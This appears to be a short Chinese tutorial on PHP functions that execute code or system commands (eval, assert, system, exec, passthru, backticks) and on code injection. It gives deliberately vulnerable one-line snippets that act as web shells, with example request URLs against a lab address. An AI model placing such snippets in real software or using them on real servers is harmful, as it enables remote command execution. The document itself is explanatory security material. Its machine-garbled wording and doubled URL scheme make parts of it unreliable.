文章目录
[+]
---- 网易云热评
1、eval,将字符串当成PHP代码实行
新建php文件,代码如下
(图片来自网络侵删)
eval($_GET['a']); //相称于实行eval(phpinfo())
访问:http://192.168.139.129/?a=phpinfo();
2、assert,判断一个表达式是否成立
新一个PHP文件,代码如下
echo(assert($_GET['a']>3));
通报的参数大于3返回1,小于3,返回缺点
3、system,实行系统命令,输出并返回末了一行结果
新建php文件,代码如下
$a= $_GET['a']($_GET['b']);
浏览器访问http://http://192.168.139.129/?a=system&b=dir,
4、exec,实行系统命令,只获取末了一行结果
新建php文件,代码如下
$a= $_GET['a']($_GET['b']);echo $a;
浏览器访问http://http://192.168.139.129/?a=exec&b=dir,
5、 passthru,实行系统命令,把命令的运行结果原样地直接输出到标准输出设备上
6、反引号,直接实行命令
新建php文件,代码如下
echo `ipconfig`;
访问该php文件
7、代码注入:
新建php文件,代码如下
$a= $_GET['a'];eval("echo $a;");
访问http://192.168.139.129/?a=213;phpinfo(),结果如下
禁止造孽,后果自大
